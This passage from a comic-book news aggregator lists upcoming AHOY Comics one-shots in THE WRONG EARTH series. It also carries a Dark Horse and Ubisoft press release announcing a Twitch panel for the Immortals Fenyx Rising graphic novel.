  • THE WRONG EARTH: PURPLE #1 from writer Stuart Moore, artist Fred Harper, and letterer Rob Steen. On sale in May, this one-shot introduces Earth-Kappa, a dark but glossy world of big hair, shoulder pads, Wall Street traders, rubber super-suits, and funk music. Get the funk up!

 

  • THE WRONG EARTH: CONFIDENCE MEN #1 by writer Mark Waid, artist Leonard Kirk, and letterer Rob Steen. On sale in June, it’s the tale of two sidekicks! On campy Earth-Alpha, circumstances force kid sidekick Stinger to become Dragonflyman’s mentor! On gritty Earth-Omega, Dragonfly and Stinger go to war—against each other!

 

  • THE WRONG EARTH: MEAT #1 from writer Tom Peyer, artist Greg Scott, and letterer Rob Steen, on sale in July. On campy Earth-Alpha, Dragonflyman and Stinger follow clues to foil the beef-themed crimes of Dr. Meat. On gritty Earth Omega, a tragedy compels Dragonfly to imprison a criminal in an abandoned slaughterhouse—just to have someone to talk to.

 

“There’s never been a better time to discover THE WRONG EARTH,” said Igle. “Read these fan favorite comics now, before they’re discovered by a Hollywood executive who divides fandom forever by releasing a barely coherent film, with at least two directors and four screenwriters attached.”

 

THE WRONG EARTH: TRAPPED ON TEEN PLANET #1, will debut on March 2. For more information, follow AHOY Comics on Twitter and Facebook, and subscribe to the AHOY newsletter.

Categories: Comic Book Blogs

REPORTING FOR DUTY THIS MARCH…

First Comics News - Thu, 12/09/2021 - 19:15

Stay tuned tomorrow for more information.

Categories: Comic Book Blogs

Dark Horse and Ubisoft Present a Live Panel on Immortals Fenyx Rising: From Great Beginnings

First Comics News - Thu, 12/09/2021 - 18:58

MILWAUKIE, Ore., (December 9, 2021)—Immortals Fenyx Rising: From Great Beginnings is a new graphic novel based on Ubisoft’s award-winning video game, Immortals Fenyx Rising. To celebrate the book’s launch in December 2021, Dark Horse and Ubisoft are teaming up to offer fans an exciting livestream opportunity: dive into the world of Immortals Fenyx Rising with creative team members from both the game and the comics!

On Friday, December 10 at 1 pm PST, fans are invited to tune in for a livestreamed panel discussion on the Dark Horse Comics Twitch channel (twitch.tv/darkhorsecomics). Joining us to explore the graphic novel and game will be special guests Jeffrey Yohalem, Lead Writer and Narrative Director on Immortals Fenyx Rising at Ubisoft, Thierry Dansereau, Art Director on Immortals Fenyx Rising at Ubisoft, and Ben Kahn, writer of the graphic novel Immortals Fenyx Rising: From Great Beginnings. Fans can ask questions in the live stream chat about the comics, and join in the discussion about creating an immersive world that spans a video game, comics, and more. Get a look inside the comic book, and hear from some of the team who helped bring these stories to colorful life on the page and screen!

The stream will be available to watch on demand following the live broadcast on Dark Horse Comics Twitch and YouTube channels.

 

Immortals Fenyx Rising: From Great Beginnings is now available from comic shops, and will be available on December 14, 2021 from bookstores and digital services. Recommended for ages 10 and up, this is a fun original story for younger readers that expands on the Ubisoft video game. Written by Kahn, with art by Georgeo Brooks and colors by Wes Dzioba, this Greek mythology-inspired tale continues directly from the world of the game. Gods must face their past and unite for the legacy of the future! When earthquakes hit the hometown of Fenyx, she joins with her mother and Zeus to be saviors together. Dangerous creatures emerge, old flames reignite, and history is once again in the making!

 

Immortals Fenyx Rising: From Great Beginnings is the latest book from the partnership between Dark Horse and Ubisoft. The two companies continue to bring fans a growing line of comics, graphic novels, and art books based on the rich worlds of Ubisoft games, from Assassin’s Creed® Valhalla to Far Cry® 6 to Immortals Fenyx RisingTM and more. See more details about currently available books here, as well as those coming soon–including The Art of Immortals Fenyx Rising, available now wherever comics and books are sold!

Categories: Comic Book Blogs

Pages

Subscribe to Furiously Eclectic People aggregator